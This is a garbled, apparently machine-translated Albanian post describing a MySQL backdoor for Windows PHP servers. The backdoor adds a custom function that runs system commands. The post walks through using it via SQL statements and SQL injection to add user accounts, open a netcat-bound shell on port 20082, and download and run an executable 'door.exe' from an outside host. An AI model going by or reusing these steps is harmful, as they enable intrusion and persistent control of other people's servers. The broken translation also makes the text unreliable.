Backdoor MySQL
Burimi: Puri Manchester
Backdoor mysql ishte një derë prapa për zhvillimin e PHP Server + mysql mysql, pasi për nga dera e pasme për të instaluar shtuar "shtet" funksion mund të ekzekutojë komandat e sistemit, dhe të fillojnë me procesin e mysql e bazuar narkoman Etj tipit derën e pasme, e realizuar cleverly jo port, asnjë proces, ka shërbime përmes trojan mur. program në WIN2003 WinXP + MYSQL5.0.X, dhe nën të kalojë.
Instalimi do të Mysql.php përhapur në server PHP, sipas të mbushur në host-user-Password DB-, klikoni mbi "Backdoor auto-instaluar mysql"
Pas instalimit të suksesshëm, mysql do të rritet me një funksion "shtetëror", ndërsa procesi MySQL është drejtimin e një nuhatës derën e pasme të këtij Backdoor në Windows nuk ka të njëjtat privilegje sistemit dhe MySQL.
Përdorimi i funksioneve shtetërore
Funksion shtetëror në fakt është një sistem PHP () "Funksioni Funksioni njëjta mund të përdoret për të ekzekutojë komandat e sistemit Ju lutemi shkruani komandën SQL:." Office dhe plotësoni deklaratën mysql duhet të ekzekutohet, të tilla si "zgjidhni shtetin (" nohack neto përdorues / add "), klikoni mbi" Ekzekuto deklaratat SQL do të kandidojë rezultate.
Me funksion shtetëror bazuar Gërhas derën e pasme, madje edhe nëse humbet WebShell, si gjatë si server, pika SQL injeksion, ne mund të me anë të injektimit. Php? Id = 1 dhe shtetërore ('përdorues neto') "Metoda e ekzekuton në server .? komandës Megjithatë, nëse pikë injeksion nuk është ajo që ne ende e quajnë Gërhas e përsëri kontrollin server dyer të dërgohet në ndonjë port të server dhe të hapura për mysql-"fillimi i paketes, do të jetë në gjendje të thërrasë Gërhas derën e pasme, të tilla si.:
Një komandë drejtimin sistem: i nc ip 80 -> Shkruani -> mysql-cmd / c përdorues net abc / shtesë> c :/ log.txt, (Shënim: "!" I fundit nuk mund të hiqej)
2 20.082 port i shell me fryrje lokal server: kandidojë parë nga nc-lp 20 082 për të monitoruar 20082 portin e makinës, dhe pastaj i nc ip 80 -> Shkruani -> mysql-c -> Shkruani
Le shkarko server: e IP nc 80 -> Shkruani -> mysql-http :/ / www.x.com / door.exe-c mydoor.exe (Shënim:! Fundit "Nuk mund të hiqej)
Përveç dërgimit "mysql-c-", komanda tjetër nuk është jehonë, por komandat përkatëse në server running.
Uninstall mysql në "rënie të funksionit të shtetit", të drejtuar mund të shkarkohen, por në të njëjtën kohë do të shkaktojë procesi i mysql të dalë, të kthehet në normale pas reboot.










































150 Trackback (s)
Ju duhet të keni hyrë brenda për të postoj një koment.